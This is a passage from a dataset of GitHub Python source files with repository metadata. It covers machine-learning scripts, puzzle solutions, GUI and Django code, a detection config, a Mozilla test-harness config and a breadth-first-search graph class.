ResNet_.resnet_v1_18_(inputs=input_images, num_classes=labels_nums, is_training=False)\n # with slim.arg_scope(vgg.vgg_arg_scope()):\n # out, end_points = vgg.vgg_16(inputs=input_images, num_classes=labels_nums, is_training=False)\n out = SqueezeNet.SqueezeNet(inputs=input_images, num_classes=labels_nums)\n score = tf.nn.softmax(out, name='output')\n # tf.contrib.quantize.create_eval_graph()\n load_variables_from_checkpoint(sess, ckpt_path)\n # Turn all the variables into inline constants inside the graph and save it.\n frozen_graph_def = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['output'])\n tf.train.write_graph(\n frozen_graph_def,\n os.path.dirname('SqueezeNet.pb'),\n os.path.basename('SqueezeNet.pb'),\n as_text=False)\n tf.logging.info('Saved frozen graph to %s', 'mnist_frozen_graph.pb')\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"wzlj/Learning","sub_path":"others/convert_frozen_graph.py","file_name":"convert_frozen_graph.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"} +{"seq_id":"71942411284","text":"#This code will perform time series forecasting using the ARIMA model from the statsmodels library. \n# The time series data is loaded into a pandas dataframe and plotted. \n# The data is then split into a training set and a test set. \n# The ARIMA model is fit to the training data and used to make predictions on the test data.\n# The actual and predicted values are plotted, \n# and the mean squared error is calculated to evaluate the accuracy of the predictions.\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom sklearn.metrics import mean_squared_error\n\n# Load the data into a pandas dataframe\ndf = pd.read_csv('time_series_data.csv', index_col='date', parse_dates=True)\n\n# Plot the time series data\ndf.plot()\nplt.show()\n\n# Create a train and test split\ntrain = df[:int(0.8*(len(df)))]\ntest = df[int(0.8*(len(df))):]\n\n# Fit an ARIMA model\nmodel = ARIMA(train, order=(1, 1, 1))\nmodel_fit = model.fit()\n\n# Make predictions (the new statsmodels ARIMA API returns the forecast array directly, so no [0] indexing)\npredictions = model_fit.forecast(steps=len(test))\n\n# Plot the actual vs predicted values\nplt.plot(test.values)\nplt.plot(predictions)\nplt.show()\n\n# Calculate the mean squared error\nmse = mean_squared_error(test.values, predictions)\nprint(\"Mean Squared Error: \", mse)\n","repo_name":"asadiko/resume-projects","sub_path":"Machine learning projects/Time Series Forecasting.py","file_name":"Time Series Forecasting.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"4102616496","text":"from turtle import Turtle\n\nALIGNMENT = \"center\"\nFONT = (\"Courier\", 20, \"bold\")\n\nclass ScoreBoard(Turtle):\n \n def __init__(self) -> None:\n super().__init__()\n self.level = 1\n self.penup()\n self.color(\"black\")\n self.goto(-220,260)\n self.update_score_board()\n self.hideturtle()\n \n def update_score_board(self) -> None:\n self.clear()\n self.write(f\"Level: {self.level}\", font= FONT, align= ALIGNMENT)\n \n def game_over(self) -> None:\n self.goto(0, 0)\n self.write(f\"Game Over\", font= FONT, align= ALIGNMENT)\n \n def increase_level(self) -> None:\n self.clear()\n self.level += 1\n self.color(\"black\")\n self.update_score_board()","repo_name":"lior-eng/100-days-Python","sub_path":"Days-1-24/Turtle Crossing Capstone/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"74581967443","text":"class Solution1:\n def permuteUnique(self, nums):\n permutations = [[]]\n for head in nums:\n permutations = [rest[:i] + [head] + rest[i:] for rest in permutations for i in\n range((rest + [head]).index(head) + 1)]\n return permutations\n\n\nclass Solution2:\n def permuteUnique(self, nums):\n ans = [[]]\n for n in nums:\n new_ans = []\n for l in ans:\n for i in range(len(l) + 1):\n new_ans.append(l[:i] + [n] + l[i:])\n if i < len(l) and l[i] == n:\n break\n ans = new_ans\n return 
ans\n","repo_name":"huangyingw/submissions","sub_path":"47/47.permutations-ii.234543289.Runtime-Error.leetcode.py","file_name":"47.permutations-ii.234543289.Runtime-Error.leetcode.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"14905696931","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/11/19\n# @Author : Luke\n# @File : idsw.ml.train.py\n# @Desc : Scripts for initializing binary classification models. 机器学习->模型训练\nimport utils\nimport logging\nimport logging.config\nlogging.config.fileConfig('logging.ini')\n\n\nclass TrainModel:\n def __init__(self, args, args2):\n \"\"\"\n Standalone version for training model\n @param args: dict\n featureCols: list\n labelCol: String\n \"\"\"\n self.logger = logging.getLogger(self.__class__.__name__)\n\n self.originalDF = None\n self.inputUrl1 = args[\"input\"][0][\"value\"]\n self.inputUrl2 = args[\"input\"][1][\"value\"]\n self.outputUrl1 = args[\"output\"][0][\"value\"]\n self.param = args[\"param\"]\n self.model = None\n self.dataUtil = utils.dataUtil(args2)\n\n def getIn(self):\n # 训练sklearn等模型\n self.logger.debug(\"using standalone model\")\n # self.originalDF = data.PyReadCSV(self.inputUrl2)\n self.originalDF = self.dataUtil.PyReadHive(self.inputUrl2)\n self.model = self.dataUtil.PyReadModel(self.inputUrl1)\n\n def execute(self):\n featureCols = self.param[\"features\"]\n labelCol = self.param[\"label\"]\n\n # 训练sklearn等模型\n import sklearn.cluster\n if (not isinstance(self.model, sklearn.cluster.k_means_.KMeans)) & (\n not isinstance(self.model, sklearn.cluster.dbscan_.DBSCAN)):\n\n if \"binary\" in self.inputUrl1:\n self.logger.info(\"training binary classification model\")\n if len(self.originalDF[labelCol].unique()) != 2:\n self.logger.error(\"training data has more than 2 classes. 
Exiting...\")\n import sys\n sys.exit(0)\n else:\n self.model.fit(self.originalDF[featureCols], self.originalDF[labelCol])\n\n elif \"multi\" in self.inputUrl1:\n self.logger.info(\"training multi-class classification model\")\n self.model.fit(self.originalDF[featureCols], self.originalDF[labelCol])\n\n elif \"reg\" in self.inputUrl1:\n self.logger.info(\"training regression model\")\n self.model.fit(self.originalDF[featureCols], self.originalDF[labelCol])\n\n else:\n self.logger.error(\"not supported\")\n import sys\n sys.exit(0)\n else:\n self.logger.error(\"not supported\")\n import sys\n sys.exit(0)\n\n def setOut(self):\n self.logger.info(\"saving trained standalone model to %s\" % self.outputUrl1)\n self.dataUtil.PyWriteModel(self.model, self.outputUrl1)\n\n\nclass TrainClustering:\n def __init__(self, args, args2):\n \"\"\"\n Standalone version for training clustering model\n @param args: dict\n featureCols: list\n \"\"\"\n self.logger = logging.getLogger(self.__class__.__name__)\n\n self.originalDF = None\n self.transformDF = None\n self.inputUrl1 = args[\"input\"][0][\"value\"]\n self.inputUrl2 = args[\"input\"][1][\"value\"]\n self.outputUrl1 = args[\"output\"][0][\"value\"]\n self.outputUrl2 = args[\"output\"][1][\"value\"]\n self.param = args[\"param\"]\n self.model = None\n self.dataUtil = utils.dataUtil(args2)\n\n def getIn(self):\n # 训练sklearn等聚类模型\n self.logger.debug(\"using scikit-learn\")\n\n # self.originalDF = data.PyReadCSV(self.inputUrl2)\n self.originalDF = self.dataUtil.PyReadHive(self.inputUrl2)\n self.transformDF = self.originalDF.copy()\n self.model = self.dataUtil.PyReadModel(self.inputUrl1)\n\n def execute(self):\n featureCols = self.param[\"features\"]\n\n # 训练sklearn等聚类模型\n if \"cluster\" in self.inputUrl1:\n self.logger.info(\"training clustering model\")\n self.model.fit(self.originalDF[featureCols])\n self.transformDF[\"prediction\"] = self.model.labels_\n\n def setOut(self):\n self.logger.info(\"saving trained standalone clustering model to %s\" % self.outputUrl1)\n self.dataUtil.PyWriteModel(self.model, self.outputUrl1)\n self.dataUtil.PyWriteHive(self.transformDF, self.outputUrl2)\n\n\nclass TuneHyperparameter:\n pass\n","repo_name":"PetraWang/idsw-python","sub_path":"idsw/ml/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"15447613406","text":"# dataset settings\ndataset_type = 'CocoDataset'\n# data_root = 'data/coco/'\nclasses = ('pedestrian','people','bicycle','car','van','truck','tricycle','awning-tricycle','bus','motor')\ndata_root = 'data/VisDrone/'\nfold = 1\npercent = 10\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),\n]\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(1333, 800),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='Collect', 
keys=['img']),\n ])\n]\ndata = dict(\n samples_per_gpu=4,\n workers_per_gpu=4,\n train=dict(\n type=\"CocoDataset\",\n classes = classes,\n ann_file=\"data/VisDrone/annotations/train.json\",\n img_prefix=\"data/VisDrone/VisDrone2019-DET-train/images/\",\n pipeline=train_pipeline\n ),\n val=dict(\n type=\"CocoDataset\",\n classes=classes,\n ann_file=data_root + 'annotations/val.json',\n img_prefix=data_root + 'VisDrone2019-DET-val/images/',\n pipeline=test_pipeline\n ),\n test=dict(\n type=\"CocoDataset\",\n classes=classes,\n ann_file=data_root + 'annotations/val.json',\n img_prefix=data_root + 'VisDrone2019-DET-val/images/',\n pipeline=test_pipeline\n )\n)\nevaluation = dict(interval=1, metric='bbox')\n\n\nwork_dir = \"work_dirs/Gaussian-FRCNN\"\n# log_config = dict(\n# interval=50,\n# hooks=[\n# dict(type=\"TextLoggerHook\"),\n# dict(\n# type=\"WandbLoggerHook\",\n# init_kwargs=dict(\n# project=\"pre_release\",\n# name=\"${cfg_name}\",\n# config=dict(\n# fold=\"${fold}\",\n# percent=\"${percent}\",\n# work_dirs=\"${work_dir}\",\n# total_step=\"${runner.max_iters}\",\n# ),\n# ),\n# by_epoch=False,\n# ),\n# ],\n# )\n","repo_name":"saintrealchoi/Gaussian-Faster-R-CNN","sub_path":"configs/datasets/coco_detection.py","file_name":"coco_detection.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"30"} +{"seq_id":"5056460907","text":"import utils\n\n#DATA = 'data/day02/testdata'\nDATA = 'data/day02/realdata'\n\n# read in the list\n# split each line into string space number\n# start with [0,0]\n# when string is forward x + number\n# when string is down z + number\n# when string is up z - number\n\nsub_path = utils.load_string_data_split_on_space(DATA)\n\ndef calculate_position(data, i_x = 0, i_z = 0):\n# Initialise coordinates to starting values\n x = i_x\n z = i_z\n\n for line in data:\n if line[0] == 'forward':\n x = x + int(line[1])\n elif line[0] == 'down':\n z = z + int(line[1])\n elif line[0] == 'up':\n z = z - int(line[1])\n else:\n print('Error, incorrect data:', line[0])\n\n return x, z\n\ndef calculate_position_and_aim(data, i_x = 0, i_z = 0, i_aim = 0):\n# Initialise coordinates to starting values\n x = i_x\n z = i_z\n aim = i_aim\n\n for line in data:\n if line[0] == 'forward':\n x = x + int(line[1])\n z = z + (aim * int(line[1]))\n elif line[0] == 'down':\n aim = aim + int(line[1])\n elif line[0] == 'up':\n aim = aim - int(line[1])\n else:\n print('Error, incorrect data:', line[0])\n\n return x, z, aim\n\npart1 = calculate_position(sub_path)\npart2 = calculate_position_and_aim(sub_path)\n\n\nprint('The first answer is:', part1[0]*part1[1])\nprint('The second answer is:', part2[0]*part2[1])\n\n#######################################################################\nprint('OK to go!')\n","repo_name":"meridiani/AoC-2021","sub_path":"day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"70676965204","text":"f = open('file.txt', 'r')\n\ns=f.read()\na=s.split('\\n')\n\ndef priority(letter):\n p = ord(letter)\n\n if(p<=90):\n return p-38\n else:\n return p-96\n\n\ntotal=0\n\n\nfor i in range(0, len(a), 3):\n #print(i)\n string1=a[i]\n string2=a[i+1]\n string3=a[i+2]\n\n #print(string2)\n \n for j in range(0, len(string1)):\n\n #if(j>len(string2) or j>len(string3)):\n #break\n #above 2 lines are wrong, because if length of string1 exceeds string2 and string3, it still might 
contain the badge(required letter)\n \n if(string2.find(string1[j])!=-1):\n if(string3.find(string1[j])!=-1):\n total+=priority(string1[j])\n break\n\n\nprint(total)\n","repo_name":"anubhavprabhakar/advent-of-code-2022","sub_path":"dec 3/dec 3 part 2 rucksack problem.py","file_name":"dec 3 part 2 rucksack problem.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"14505591712","text":"from sharpener import Benchmark\n\nfrom tests import config\nfrom bottomless_ReJSON import RedisInterface\n\n\n\nclass in_object(Benchmark):\n\n\tdef prepare(self, items_number):\n\n\t\tself.interface = RedisInterface(host=config['db']['host'], port=config['db']['port'])\n\t\tself.interface.clear()\n\t\tself.interface['sessions'] = {\n\t\t\tstr(i): {}\n\t\t\tfor i in range(items_number)\n\t\t}\n\n\tdef run(self, items_number):\n\t\tstr(items_number // 2) in self.interface\n\t\n\tdef clean(self, **kwargs):\n\t\tself.interface.clear()","repo_name":"MentalBlood/bottomless_ReJSON","sub_path":"benchmarks/benchmark_contains.py","file_name":"benchmark_contains.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"7258365708","text":"from PySide6 import QtCore\nfrom dataclasses import dataclass\n\n\ndef createThreadAndWorker(function, finished_slot, *args, **kwargs):\n thread = QtCore.QThread()\n worker = GenericWorker(function, *args, **kwargs)\n worker.moveToThread(thread)\n thread.started.connect(worker.run)\n worker.finished.connect(finished_slot)\n worker.finished.connect(thread.quit)\n worker.finished.connect(worker.deleteLater)\n thread.finished.connect(thread.deleteLater)\n thread.start()\n return thread, worker\n\n\n@dataclass\nclass RunnableReturn:\n id_: int\n value: object\n\n\nclass GenericRunnableSignals(QtCore.QObject):\n finished = QtCore.Signal(RunnableReturn)\n\n\nclass GenericRunnable(QtCore.QRunnable):\n def __init__(self, id_: int, function, *args, **kwargs) -> None:\n super().__init__()\n self._id_ = id_\n self._function = function\n self._args = args\n self._kwargs = kwargs\n\n self.signals = GenericRunnableSignals()\n\n def run(self):\n res = RunnableReturn(self._id_, None)\n try:\n res.value = self._function(*self._args, **self._kwargs)\n except Exception:\n pass\n self.signals.finished.emit(res)\n\n\nclass GenericWorker(QtCore.QObject):\n finished = QtCore.Signal(object)\n\n def __init__(\n self, function, *args, parent: QtCore.QObject | None = None, **kwargs\n ) -> None:\n super().__init__(parent)\n self.function = function\n self.args = args\n self.kwargs = kwargs\n\n @QtCore.Slot()\n def run(self):\n res = None\n try:\n res = self.function(*self.args, **self.kwargs)\n except Exception:\n pass\n self.finished.emit(res)\n","repo_name":"rmallow/howdyCoder","sub_path":"howdyCoder/ui/util/genericWorker.py","file_name":"genericWorker.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"35841076382","text":"FUNCTIONS = [\"max\",\"min\",\"sum\",\"average\"]\n\ndef col_max(table, column):\n temp = []\n for record in table:\n temp.append(record[column])\n return max(temp)\n\ndef col_min(table, column):\n temp = []\n for record in table:\n temp.append(record[column])\n return min(temp)\n\ndef col_sum(table, column):\n temp = []\n for record in table:\n temp.append(record[column])\n return 
sum(temp)\n\ndef col_average(table, column):\n temp = []\n for record in table:\n temp.append(record[column])\n return sum(temp)/len(temp)\n\ndef aggregateHandler(column,aggregate,table):\n if aggregate == 'max':\n return col_max(table, column)\n elif aggregate == 'min':\n return col_min(table, column)\n elif aggregate == 'sum':\n return col_sum(table, column)\n elif aggregate == 'average':\n return col_average(table, column)\n","repo_name":"PrajwalKrishna/Mini-sql-engine","sub_path":"src/aggregateFunctions.py","file_name":"aggregateFunctions.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"6730542140","text":"import os\nimport sys\n\n# OS Specifics\nABS_WORK_DIR = os.path.join(os.getcwd(), \"build\")\nBINARY_PATH = os.path.join(ABS_WORK_DIR, \"firefox\", \"firefox.exe\")\nINSTALLER_PATH = os.path.join(ABS_WORK_DIR, \"installer.zip\")\nXPCSHELL_NAME = 'xpcshell.exe'\nEXE_SUFFIX = '.exe'\nDISABLE_SCREEN_SAVER = False\nADJUST_MOUSE_AND_SCREEN = True\n#####\nconfig = {\n \"buildbot_json_path\": \"buildprops.json\",\n \"exes\": {\n 'python': sys.executable,\n 'virtualenv': [sys.executable, 'c:/mozilla-build/buildbotve/virtualenv.py'],\n 'hg': 'c:/mozilla-build/hg/hg',\n 'mozinstall': ['%s/build/venv/scripts/python' % os.getcwd(),\n '%s/build/venv/scripts/mozinstall-script.py' % os.getcwd()],\n 'tooltool.py': [sys.executable, 'C:/mozilla-build/tooltool.py'],\n },\n ###\n \"installer_path\": INSTALLER_PATH,\n \"binary_path\": BINARY_PATH,\n \"xpcshell_name\": XPCSHELL_NAME,\n \"virtualenv_path\": 'venv',\n \"virtualenv_python_dll\": os.path.join(os.path.dirname(sys.executable), \"python27.dll\"),\n \"find_links\": [\n \"http://pypi.pvt.build.mozilla.org/pub\",\n \"http://pypi.pub.build.mozilla.org/pub\",\n ],\n \"pip_index\": False,\n \"exe_suffix\": EXE_SUFFIX,\n \"run_file_names\": {\n \"mochitest\": \"runtests.py\",\n \"webapprt\": \"runtests.py\",\n \"reftest\": \"runreftest.py\",\n \"xpcshell\": \"runxpcshelltests.py\",\n \"cppunittest\": \"runcppunittests.py\",\n \"jittest\": \"jit_test.py\",\n \"mozbase\": \"test.py\",\n \"mozmill\": \"runtestlist.py\",\n },\n \"minimum_tests_zip_dirs\": [\"bin/*\", \"certs/*\", \"modules/*\", \"mozbase/*\", \"config/*\"],\n \"specific_tests_zip_dirs\": {\n \"mochitest\": [\"mochitest/*\"],\n \"webapprt\": [\"mochitest/*\"],\n \"reftest\": [\"reftest/*\", \"jsreftest/*\"],\n \"xpcshell\": [\"xpcshell/*\"],\n \"cppunittest\": [\"cppunittest/*\"],\n \"jittest\": [\"jit-test/*\"],\n \"mozbase\": [\"mozbase/*\"],\n \"mozmill\": [\"mozmill/*\"],\n },\n # test harness options are located in the gecko tree\n \"in_tree_config\": \"config/mozharness/windows_config.py\",\n # local mochi suites\n \"all_mochitest_suites\":\n {\n \"plain1\": [\"--total-chunks=5\", \"--this-chunk=1\", \"--chunk-by-dir=4\"],\n \"plain2\": [\"--total-chunks=5\", \"--this-chunk=2\", \"--chunk-by-dir=4\"],\n \"plain3\": [\"--total-chunks=5\", \"--this-chunk=3\", \"--chunk-by-dir=4\"],\n \"plain4\": [\"--total-chunks=5\", \"--this-chunk=4\", \"--chunk-by-dir=4\"],\n \"plain5\": [\"--total-chunks=5\", \"--this-chunk=5\", \"--chunk-by-dir=4\"],\n \"plain\": [],\n \"plain-chunked\": [\"--chunk-by-dir=4\"],\n \"mochitest-push\": [\"--subsuite=push\"],\n \"chrome\": [\"--chrome\"],\n \"browser-chrome\": [\"--browser-chrome\"],\n \"browser-chrome-chunked\": [\"--browser-chrome\", \"--chunk-by-runtime\"],\n \"mochitest-gl\": [\"--subsuite=webgl\"],\n \"mochitest-devtools-chrome\": 
[\"--browser-chrome\", \"--subsuite=devtools\"],\n \"mochitest-devtools-chrome-chunked\": [\"--browser-chrome\", \"--subsuite=devtools\", \"--chunk-by-runtime\"],\n \"mochitest-metro-chrome\": [\"--browser-chrome\", \"--metro-immersive\"],\n \"jetpack-package\": [\"--jetpack-package\"],\n \"jetpack-addon\": [\"--jetpack-addon\"],\n \"a11y\": [\"--a11y\"],\n \"plugins\": ['--setpref=dom.ipc.plugins.enabled=false',\n '--setpref=dom.ipc.plugins.enabled.x86_64=false',\n '--ipcplugins']\n },\n # local webapprt suites\n \"all_webapprt_suites\": {\n \"chrome\": [\"--webapprt-chrome\", \"--browser-arg=-test-mode\"],\n \"content\": [\"--webapprt-content\"]\n },\n # local reftest suites\n \"all_reftest_suites\": {\n \"reftest\": [\"tests/reftest/tests/layout/reftests/reftest.list\"],\n \"crashtest\": [\"tests/reftest/tests/testing/crashtest/crashtests.list\"],\n \"jsreftest\": [\"--extra-profile-file=tests/jsreftest/tests/user.js\", \"tests/jsreftest/tests/jstests.list\"],\n \"reftest-ipc\": ['--setpref=browser.tabs.remote=true',\n '--setpref=browser.tabs.remote.autostart=true',\n '--setpref=layers.async-pan-zoom.enabled=true',\n 'tests/reftest/tests/layout/reftests/reftest-sanity/reftest.list'],\n \"reftest-no-accel\": [\"--setpref=gfx.direct2d.disabled=true\", \"--setpref=layers.acceleration.disabled=true\",\n \"tests/reftest/tests/layout/reftests/reftest.list\"],\n \"reftest-omtc\": [\"--setpref=layers.offmainthreadcomposition.enabled=true\",\n \"tests/reftest/tests/layout/reftests/reftest.list\"],\n \"crashtest-ipc\": ['--setpref=browser.tabs.remote=true',\n '--setpref=browser.tabs.remote.autostart=true',\n '--setpref=layers.async-pan-zoom.enabled=true',\n 'tests/reftest/tests/testing/crashtest/crashtests.list'],\n },\n \"all_xpcshell_suites\": {\n \"xpcshell\": [\"--manifest=tests/xpcshell/tests/all-test-dirs.list\",\n \"%(abs_app_dir)s/\" + XPCSHELL_NAME]\n },\n \"all_cppunittest_suites\": {\n \"cppunittest\": ['tests/cppunittest']\n },\n \"all_jittest_suites\": {\n \"jittest\": []\n },\n \"all_mozbase_suites\": {\n \"mozbase\": []\n },\n \"run_cmd_checks_enabled\": True,\n \"preflight_run_cmd_suites\": [\n # NOTE 'enabled' is only here while we have unconsolidated configs\n {\n \"name\": \"disable_screen_saver\",\n \"cmd\": [\"xset\", \"s\", \"off\", \"s\", \"reset\"],\n \"architectures\": [\"32bit\", \"64bit\"],\n \"halt_on_failure\": False,\n \"enabled\": DISABLE_SCREEN_SAVER\n },\n {\n \"name\": \"run mouse & screen adjustment script\",\n \"cmd\": [\n # when configs are consolidated this python path will only show\n # for windows.\n sys.executable,\n \"../scripts/external_tools/mouse_and_screen_resolution.py\",\n \"--configuration-url\",\n \"https://hg.mozilla.org/%(repo_path)s/raw-file/%(revision)s/\" +\n \"testing/machine-configuration.json\"],\n \"architectures\": [\"32bit\"],\n \"halt_on_failure\": True,\n \"enabled\": ADJUST_MOUSE_AND_SCREEN\n },\n ],\n \"vcs_output_timeout\": 1000,\n \"minidump_save_path\": \"%(abs_work_dir)s/../minidumps\",\n \"buildbot_max_log_size\": 52428800,\n \"default_blob_upload_servers\": [\n \"https://blobupload.elasticbeanstalk.com\",\n ],\n \"blob_uploader_auth_file\": os.path.join(os.getcwd(), \"oauth.txt\"),\n \"download_minidump_stackwalk\": True,\n \"minidump_stackwalk_path\": \"win32-minidump_stackwalk.exe\",\n \"minidump_tooltool_manifest_path\": 
\"config/tooltool-manifests/win32/releng.manifest\",\n}\n","repo_name":"wicknix/AF-OSX-PPC","sub_path":"testing/mozharness/configs/unittests/win_unittest.py","file_name":"win_unittest.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"30"} +{"seq_id":"19357843303","text":"__all__ = ()\n\nfrom .fields import (\n put_owner_id_into, put_owner_into, put_owner_type_into, put_sku_id_into, validate_owner, validate_owner_id,\n validate_owner_type, validate_sku_id\n)\n\n\nENTITLEMENT_FIELD_CONVERTERS = {\n 'owner': (validate_owner, put_owner_into),\n 'owner_id': (validate_owner_id, put_owner_id_into),\n 'owner_type': (validate_owner_type, put_owner_type_into),\n 'sku': (validate_sku_id, put_sku_id_into),\n 'sku_id': (validate_sku_id, put_sku_id_into),\n}\n\n","repo_name":"HuyaneMatsu/hata","sub_path":"hata/discord/application/entitlement/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":167,"dataset":"github-code","pt":"30"} +{"seq_id":"35597012838","text":"nums = []\nevenNums = []\noddNums = []\noption = None\n\nwhile option != \"N\":\n num = int(input(f\"=> Type any integer number: \"))\n nums.append(num)\n \n option = input(f\"=> Do you want to continue? [Y/N] \").upper()\n print(f\"-\" * 45)\n \nfor num in nums:\n if num % 2 == 0:\n evenNums.append(num)\n else:\n oddNums.append(num)\n \nprint(f\"=> The whole list is: {nums}\")\nprint(f\"=> The list with even numbers is: {evenNums}\")\nprint(f\"=> The list with odd numbers is: {oddNums}\")","repo_name":"paulogosik/python","sub_path":"Curso em Vídeo - Mundo 3/Exercicios/ex82.py","file_name":"ex82.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"3425503230","text":"from django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm, BaseUserCreationForm, PasswordChangeForm\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import CreateView\n\nfrom .forms import LoginForm, UserRegistrationForm, UserEditForm, ProfileEditForm, PasswordChangingForm, \\\n ProfileAdminForm\nfrom .models import Profile\n\n\n# Create your views here.\ndef loginview(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n # print(form)\n if form.is_valid():\n # print(form)\n data = form.cleaned_data\n user = authenticate(\n request, username=data['username'], password=data['password'])\n # print(user.username)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('index_view')\n else:\n form = LoginForm()\n return render(request, 'registration/login.html', {'form': form})\n\n\ndef logoutview(request):\n if request.method == 'POST':\n logout(request)\n return redirect('registration/login.html')\n\n return render(request, 'registration/logged_out.html', {})\n\n\n@login_required\ndef user_profile(request):\n user = request.user\n profile = Profile.objects.get(user=user)\n context = {\n 'user': user,\n 'profile': profile\n }\n return render(request, 'profile/profile.html', context)\n\n\nfrom .models import 
Profile\ndef user_register(request):\n if request.method == \"POST\":\n user_form = UserRegistrationForm(request.POST)\n profile_form = ProfileAdminForm(request.POST, request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n new_user = user_form.save(commit=False)\n new_user.set_password(user_form.cleaned_data['password'])\n new_user.save()\n context = {\n 'new_user':new_user\n }\n return render(request, 'account/register_done.html', context)\n else:\n return HttpResponse('This username is already taken.')\n else:\n user_form = UserRegistrationForm()\n profile = ProfileAdminForm()\n context = {\n 'user_form': user_form,\n 'profile': profile\n }\n return render(request, 'account/register.html', context)\nclass SignUpView(CreateView):\n form_class = UserCreationForm\n success_url = reverse_lazy('login')\n template_name = 'account/register.html'\n\n\n@login_required\ndef edit_user(request):\n if request.method == 'POST':\n user_form = UserEditForm(instance=request.user, data=request.POST)\n profile_form = ProfileEditForm(\n instance=request.user.profile, data=request.POST, files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n else:\n return render(request, 'account/profile_edit.html', {'user_form': user_form, 'profile_form': profile_form})\n else:\n user_form = UserEditForm(instance=request.user)\n profile_form = ProfileEditForm(instance=request.user.profile)\n return render(request, 'account/profile_edit.html', {'user_form': user_form, 'profile_form': profile_form})\n\n\nclass EditUserView(LoginRequiredMixin, View):\n\n def get(self, request):\n user_form = UserEditForm(instance=request.user)\n profile_form = ProfileEditForm(instance=request.user.profile)\n\n return render(request, 'account/profile_edit.html', {'user_form': user_form, 'profile_form': profile_form})\n\n def post(self, request):\n if request.method == 'POST':\n user_form = UserEditForm(instance=request.user, data=request.POST)\n profile_form = ProfileEditForm(\n instance=request.user.profile, data=request.POST, files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n return redirect('profile')\n","repo_name":"Adhamov88/Newswebsite","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"27474912756","text":"from collections import deque\nclass Graph:\n def __init__(self,G):\n self.adjList = [x[:] for x in G]\n self.numV = len(G)\n\n def bfsutil(self,start):\n self.distance[start] = 0\n self.color[start] = 1\n q = deque()\n q.append(start)\n while len(q) > 0:\n n = q.popleft()\n for v in self.adjList[n]:\n if self.color[v] is False:\n q.append(v)\n self.color[v] = True\n self.parent[v] = n\n self.distance[v] = self.distance[n] + 1\n print(\"Current node \", n, \" distance : \", self.distance[n])\n\n\n def bfs(self,start):\n self.color = [False for x in range(self.numV)]\n self.distance = [10 for x in range(self.numV)]\n self.parent = [None for x in range(self.numV)]\n self.bfsutil(start)\n\ndef main():\n ''' Adjacency List representation. G is a list of lists. 
